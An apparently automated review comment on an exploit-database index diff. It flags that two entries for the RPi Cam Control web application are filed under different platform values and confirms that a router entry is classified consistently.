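Review bot: the new 45361 entry files `RPi Cam Control < 6.4.25` under platform `linux`, while the existing RPi Cam Control entry 42638 in the hunk above sits under `php/webapps`; both target the same PHP web application, so one platform value should be used (or the reason for the split recorded), otherwise a platform filter returns only half of the entries for this product. The 45351 `LW-N605R` entry under `hardware/webapps` is consistent with the sibling router entries in this file.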
